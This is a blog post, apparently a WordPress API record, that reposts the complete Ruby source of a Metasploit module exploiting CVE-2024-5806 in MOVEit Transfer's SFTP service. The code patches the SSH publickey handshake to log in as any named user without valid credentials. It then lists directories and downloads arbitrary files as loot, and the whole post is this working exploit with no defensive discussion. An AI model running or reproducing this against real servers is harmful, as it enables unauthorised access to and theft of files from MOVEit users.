{"id":59297,"date":"2024-08-31T23:40:38","date_gmt":"2024-08-31T20:40:38","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/180703\/progress_moveit_sftp_fileread_cve_2024_5806.rb.txt"},"modified":"2024-08-31T23:40:38","modified_gmt":"2024-08-31T20:40:38","slug":"progress-moveit-sftp-authentication-bypass-for-arbitrary-file-read","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/progress-moveit-sftp-authentication-bypass-for-arbitrary-file-read\/","title":{"rendered":"Progress MOVEit SFTP Authentication Bypass for Arbitrary File Read"},"content":{"rendered":"

##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##
require ‘net\/ssh\/transport\/session’
require ‘net\/sftp’
require ‘openssl’<\/p>\n

class MetasploitModule < Msf::Auxiliary<\/p>\n

include Msf::Auxiliary::Report<\/p>\n

def initialize(info = {})
super(
update_info(
info,
‘Name’ => ‘Progress MOVEit SFTP Authentication Bypass for Arbitrary File Read’,
‘Description’ => %q{
This module exploits CVE-2024-5806, an authentication bypass vulnerability in the MOVEit Transfer SFTP service. The
following version are affected:<\/p>\n

* MOVEit Transfer 2023.0.x (Fixed in 2023.0.11)
* MOVEit Transfer 2023.1.x (Fixed in 2023.1.6)
* MOVEit Transfer 2024.0.x (Fixed in 2024.0.2)<\/p>\n

The module can establish an authenticated SFTP session for a MOVEit Transfer user. The module allows for both listing
the contents of a directory, and the reading of an arbitrary file.
},
‘License’ => MSF_LICENSE,
‘Author’ => [
‘sfewer-r7’ # MSF Module & Rapid7 Analysis
],
‘References’ => [
[‘CVE’, ‘2024-5806’],
[‘URL’, ‘https:\/\/attackerkb.com\/topics\/44EZLG2xgL\/cve-2024-5806\/rapid7-analysis’] # AttackerKB Rapid7 Analysis.
],
‘DisclosureDate’ => ‘2024-06-25’,
‘Notes’ => {
‘Stability’ => [CRASH_SAFE],
‘SideEffects’ => [IOC_IN_LOGS],
‘Reliability’ => []}
)
)<\/p>\n

register_options(
[
Opt::RHOST,
Opt::RPORT(22),
OptBool.new(‘STORE_LOOT’, [false, ‘Store the target file as loot’, true]),
OptString.new(‘TARGETUSER’, [true, ‘A valid username to authenticate as.’, nil]),
OptString.new(‘TARGETFILE’, [true, ‘The full path of a target file or directory to read.’, ‘\/’]),
Opt::Proxies
])
end<\/p>\n

# This method will be used by net\/ssh when creating a new TCP socket. We need this so the net\/ssh library will
# honor Metasploit’s network pivots, and route a connection through the expected session if applicable.
def open(host, port, _connection_options = nil)
vprint_status(“Creating Rex::Socket::Tcp to #{host}:#{port}…”)
Rex::Socket::Tcp.create(
‘PeerHost’ => host,
‘PeerPort’ => port,
‘Proxies’ => datastore[‘Proxies’],
‘Context’ => {
‘Msf’ => framework,
‘MsfExploit’ => self
}
)
end<\/p>\n

def check
# Our check method will establish an unauthenticated connection to the remote SFTP (which is an extension of SSH)
# service and we pull out the servers version string.
transport = ::Net::SSH::Transport::Session.new(
datastore[‘RHOST’],
{
port: datastore[‘RPORT’],
# Use self as a proxy for the net\/ssh library, to allow us to use Metasploit’s Rex sockets, which will honor pivots.
proxy: self
}
)<\/p>\n

ident = transport.server_version.version<\/p>\n

# We test the SSH version string for a known value of MOVEit SFTP.
return Msf::Exploit::CheckCode::Safe(ident) unless ident == ‘SSH-2.0-MOVEit Transfer SFTP’<\/p>\n

# We cannot get a product version number, so the best we can do is return Detected.
Msf::Exploit::CheckCode::Detected(ident)
rescue ::Rex::ConnectionRefused
Msf::Exploit::CheckCode::Unknown(‘Connection Refused’)
rescue ::Rex::HostUnreachable
Msf::Exploit::CheckCode::Unknown(‘Host Unreachable’)
rescue ::Rex::ConnectionTimeout, ::Net::SSH::ConnectionTimeout
Msf::Exploit::CheckCode::Unknown(‘Connection Timeout’)
end<\/p>\n

def run
# We want to change the behaviour of the build_request method. So first we alias the original build_request
# method, so we can restore it later, as other things in MSF may use Net::SSH, and will expect normal behaviour.
::Net::SSH::Authentication::Methods::Publickey.send(:alias_method, :orig_build_request, :build_request)<\/p>\n

# Define the new behaviour. We exploit CVE-2024-5806 by supplying an invalid username (like an empty string) upon
# the initial publickey auth request, then when sending the signature response to the server, we provide the username
# of the valid user account we want to authenticate as.
::Net::SSH::Authentication::Methods::Publickey.send(:define_method, :build_request) do |pub_key, username, next_service, alg, has_sig|
orig_build_request(pub_key, has_sig ? username : ”, next_service, alg, has_sig)
end<\/p>\n

print_status(“Authenticating as: #{datastore[‘TARGETUSER’]}@#{datastore[‘RHOST’]}:#{datastore[‘RPORT’]}”)<\/p>\n

# With ::Net::SSH::Authentication::Methods::Publickey monkey patched above, we can trigger the auth bypass and get
# back a valid SFTP session which we can interact with.
::Net::SFTP.start(
datastore[‘RHOST’],
datastore[‘TARGETUSER’],
{
port: datastore[‘RPORT’],
auth_methods: [‘publickey’],
# The vulnerability allows us to supply any well formed RSA key and it will be accepted. So we generate a new
# key (in PEM format) every time we exploit the vulnerability.
key_data: [OpenSSL::PKey::RSA.new(2048).to_pem],
# Use self as a proxy for the net\/ssh library, to allow us to use Metasploit’s Rex sockets, which will honor pivots.
proxy: self
}
) do |sftp|
if File.directory? datastore[‘TARGETFILE’]print_status(“Listing directory: #{datastore[‘TARGETFILE’]}”)<\/p>\n

sftp.dir.glob(datastore[‘TARGETFILE’], ‘**\/*’) do |entry|
# When we print the entry, we want to print the full path for each entry, so that further use of this module
# can set the TARGETFILE correctly to the full path of a target file. The longname will contain (along with
# permission, sizes and timestamps) a file\/dir name but no path information. As we are using glob to
# recursively list the contents of all sub folders, we reconstitute the full path for every entry before
# printing it.
entry_full_path = File.join(datastore[‘TARGETFILE’], entry.name)<\/p>\n

print_line(entry.longname.gsub(File.basename(entry.name), entry_full_path))
end
else
print_status(“Downloading file: #{datastore[‘TARGETFILE’]}”)<\/p>\n

read_file(sftp, datastore[‘TARGETFILE’])
end
end
rescue ::Net::SFTP::StatusException
print_error(‘SFTP Status Exception.’)
rescue ::Net::SSH::AuthenticationFailed
print_error(‘SFTP Authentication Failed. Is TARGETUSER a valid username?’)
rescue ::Rex::ConnectionRefused
print_error(‘SFTP Connection Refused.’)
rescue ::Rex::HostUnreachable
print_error(‘SFTP Host Unreachable.’)
rescue ::Rex::ConnectionTimeout, ::Net::SSH::ConnectionTimeout
print_error(‘SFTP Connection Timeout.’)
ensure
::Net::SSH::Authentication::Methods::Publickey.send(:alias_method, :build_request, :orig_build_request)
end<\/p>\n

def read_file(sftp, file_path)
sftp.open!(file_path) do |open_response|
unless open_response.ok?
print_error(‘SFTP open failed. Is the TARGETFILE path correct?’)
break
end<\/p>\n

file_size = sftp.fstat!(open_response[:handle]).size<\/p>\n

sftp.read!(open_response[:handle], 0, file_size) do |read_response|
unless read_response.ok?
print_error(‘SFTP read failed.’)
break
end<\/p>\n

file_data = read_response[:data].to_s<\/p>\n

if datastore[‘STORE_LOOT’]print_status(‘Storing the file data to loot…’)<\/p>\n

store_loot(
file_path,
file_data.ascii_only? ? ‘text\/plain’ : ‘application\/octet-stream’,
datastore[‘RHOST’],
file_data,
datastore[‘TARGETFILE’],
‘File read from Progress MOVEit SFTP server’
)
else
print_line(file_data)
end
end
ensure
sftp.close!(open_response[:handle]) if open_response.ok?
end
end<\/p>\n

end<\/p>\n","protected":false},"excerpt":{"rendered":"

### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework##require ‘net\/ssh\/transport\/session’require ‘net\/sftp’require ‘openssl’ class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {})super(update_info(info,‘Name’ => ‘Progress MOVEit SFTP Authentication Bypass for Arbitrary File Read’,‘Description’ => %q{This module exploits CVE-2024-5806, an authentication bypass vulnerability in the MOVEit Transfer SFTP service. Thefollowing version are affected: * MOVEit Transfer 2023.0.x …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59297","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59297","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59297"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59297\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59297"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59297"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59297"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}